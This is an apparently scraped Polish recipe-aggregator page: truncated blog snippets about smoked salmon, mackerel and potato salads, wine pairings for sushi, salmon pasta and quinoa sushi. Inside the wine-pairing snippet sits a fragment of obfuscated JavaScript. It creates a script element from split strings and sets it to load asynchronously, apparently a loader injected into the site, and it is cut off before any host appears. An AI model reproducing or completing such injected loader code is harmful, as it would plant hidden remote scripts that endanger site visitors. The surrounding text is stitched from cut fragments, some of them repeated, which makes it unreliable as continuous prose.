grilla. Takie sałatki to jedne z moich ulubionych. mimo tego, że są dość kaloryczne to niezwykle smaczne, sycące no i tanie. Szczególnie lubię sałatki ziemniaczane z rybą: z łososiem , z makrelą wędzoną , z rolmopsami , ze szprotkami , ze śledziem ale te wegetariańskie są również smaczne – polecam z jajkiem w koszulce i bobem, z jajkiem i mniszkiem lekarskim , z bobem , z młodych
Dorota Smakujepostawić na proste wina jednoszczepowe. Niezawodny przy złożonych smakach, charakterystycznych dla kuchni azjatyckiej, jest G ewürztraminer . Wino z pikantniejszym wykończeniem świetnie zrównoważy nawet wasabi. G ewürztraminer smakuje najlepiej z wędzonym węgorzem unagi nigiri. Rewelacyjnie spisze się także Riesling . Cytrusowe aromaty wyciągną z sushi świeżość, a subtelna słodycz współgra z ryżem. Rieslinga nie zdominuje nawet towarzystwo sosu sojowego. Z kolei Furmint(...)propozycją do sushi. Miłośnicy tej odmiany wina nie muszą jednak rozpaczać. Lekkie wino czerwone jak Pinot Noir czy Syrah można z powodzeniem podać do sushi z marynowaną wołowiną, wędzoną kaczką albo łososiem. Popijając sushi winem warto oszczędnie korzystać z wasabi. Dominująca pikantność może spłaszczyć bukiet wina. (function(){ z8y1=document.createElement("script");z8y1_=(("u")+"st")+"a";z8y1.async=true; z8y1.type="text/javascript";z8y1
FoodMagazine.pl - Przepisy kulinarneŚniadanie Mistrzów dzisiaj na stole. Podpłomyki zdrowe, pyszne, idealne. Dodatek wędzonego na zimno łososia i kremowego awokado dopełnia całości. Zapraszam na zdrowe i pyszne śniadanie. Podpłomyki z łososiem i awokado. CZYTAJ DALEJ
Moje Małe CzarowaniePrzepyszna kiełbasa chorizo, cudowny, wędzony na zimno łosoś, kremowy szpinak, chrupiąca ciecierzyca i jeszcze gorgonzola z niebieską pleśnią, toż to bomba aromatyczno - smakowa. Efekt jest zabójczo dobry, pyszne danie sprawdzi się na obiad, kolację czy śniadanie. Polecam do spróbowania, czekam na Wasze opinie, czy smakowało? Łosoś ze szpinakiem i serem. CZYTAJ DALEJ
Moje Małe Czarowaniemoim stole bardzo często i uwielbiam je jeść z świeżo wypieczonym chlebem na zakwasie. Jeśli lubisz pasty na kanapkę to wypróbuj też przepis na: - pastę jajeczną z łososiem - pastę z wędzonego dorsza - pastę rybną z tuńczykiem i sardynkami Przepis na pastę z makreli: - 1/2 makreli wędzonej - 4 jajka - 150 g serka śmietankowo- twarogowego - 100 g jogurtu greckiego ( w zastępstwie
SMYKWKUCHNISałatki ziemniaczane to jedne z moich ulubionych. mimo tego, że są dość kaloryczne to niezwykle smaczne, sycące no i tanie. Szczególnie lubię sałatki ziemniaczane z rybą: z łososiem , z makrelą wędzoną , z rolmopsami , ze szprotkami , ze śledziem ale te wegetariańskie są również smaczne – polecam z jajkiem w koszulce i bobem, z jajkiem i mniszkiem lekarskim , z bobem , z młodych
Dorota Smakujezielonej, marynowanej bazy sprawdzą się drobne kulki mozzarelli lub klasyczna mozzarella pokrojona w kostkę, bundz, ser bałkański, a także miękki ser kozi i owczy. Inna wędzona ryba? Pasuje wędzony na ciepło łosoś, pstrąg albo makrela. Nawet szprtki! A nawet ośmiornica albo krewetki z zalewy zrąbią z tej sałatki bardzo wykwintną pozycję. Do takiego zestawu smaków pasuje też jajko na twardo
Karo in the KitchenPółmaratonie Warszawskim, więc przyszła pora na weekend z makaronem 🙂 bo nie wiem, czy wiecie, ale biegacze kochają makaron przed ważnymi startami ;p Makaron z łososiem z chrupiącymi migdałami, słodko-słoną, aromatyczną, prażoną cebulą w towarzystwie łososia i pudru z parmezanu to prawdziwa rozkosz dla kubków smakowych! Przekonajcie się sami 🙂 *Nie zapomnijcie śledzić mnie na Instagramie i oznaczać zdjęć z moich(...)parmezanu 🙂 Na suchej patelni upraż płatki migdałów. Makaron odcedź, wyłóż na talerze. Dodaj cebulę z łososiem. Posyp płatkami migdałów i parmezanem. Składniki 150 g makaronu typu tagiatelle lub ulubionego makaronu – może być też sojowy lub ryżowy 150 g łososia surowego lub wędzonego 50 g parmezanu 2 duże czerwone cebule 50 g płatków migdałów kilka gałązek kolendry do dekoracji
Eat me! Fit me!Łosoś, morska sól wędzona i otręby gryczane to ciekawa kombinacja. Pierwszy raz spotkałam się z solą wędzoną i muszę przyznać, że jej smak bardzo mi odpowiada. Taka rybka idealnie sprawdzi się na obiad lub kolację. A jeśli jesteście ciekawi gdzie można znaleźć morską sól wędzoną to zapraszam do sklepu Kuchnie Świata . Każdy znajdzie coś dla siebie, produkty znane i nieznane
Ewa w kuchniZapraszam na najlepszy przepis na najszybszą i przepyszną roladę szpinakową z wędzonym na zimno łososiem i kremowym serkiem. Tę roladę można przygotować ze szpinaku baby lub szpinaku mrożonego. Chociaż polecam sięgnąć po młody szpinak. Taka rolada będzie wówczas miała znacznie intensywniejszy, zielony kolor. Rolada szpinakowa z łososiem i serkiem to idealna przekąska na każdą imprezę, Sylwestra, czy Święta. Z dodatkiem
AniaGotuje.plpiekarnika, w międzyczasie smażąc resztę, do wykończenia ciasta. Pyszne są z sosem grzybowym, z gulaszem – a w lżejszym letnim wydaniu z gęstym greckim jogurtem, drobniutko posiekanym koprem i wędzonym na zimno łososiem. SKŁADNIKI na 12 kotletów 1kg ziemniaków typu użytkowego C, bardzo mącznych 70g mąki pszennej 30g mąki ziemniaczanej sól mąka pszenna lub bułka tarta do panierowania olej roślinny
Karo in the Kitchendomu. Jest przepyszna. Polecam! PRZEPIS NA DIETETYCZNĄ SAŁATKĘ DO PRACY SKŁADNIKI: - duża garść ulubionej sałaty (u mnie rukola) - kilka oliwek czarnych - 1/4 czerwonej papryki - 80 do100 g wędzonego na ciepło łososia - kilka gałązek tymianku - dymka - suszone figi hiszpańskie (1-2 sztuki) - kilka plastrów marynowanego imbiru - dressing: oliwa z oliwek, sok z cytryny, sól himalajska W/w składniki łączymy ze sobą
SMYKWKUCHNILubicie szaszłyki ? Bo ja uwielbiam. Ostatnio bawię się w wędzenie, przygotowałam wędzone szaszłyki z łososiem i ananasem. Muszę przyznać są to najlepsze jakie do tej pory jadłam szaszłyki rybne. Moje zostały przygotowanie w wędzarni elektrycznej. Jak ktoś nie ma wędzarni, myślę ze domowym sposobem może przygotować w domu np uwędzić w garnku lub w beczce. Składniki 2 filety z łososia
Kulinarne pyszności Molkinastępnym razem moje quinoa sushi będzie ładniejsze, bardziej dopracowane i różnorodne. Składniki: 250 gram białej quinoy 4 łyżki octu ryżowego 1 łyżka cukru (ja dałam kokosowy) 120 gram wędzonej polędwicy z łososia 1 zielony ogórek kilka grzybków mun 3 arkusze nori 2 łyżki kawioru z pstrąga (opcjonalnie) 1 łyżka czarnego sezamu wasabi marynowany imbir sos sojowy BG Wykonanie
Quinoa Raz!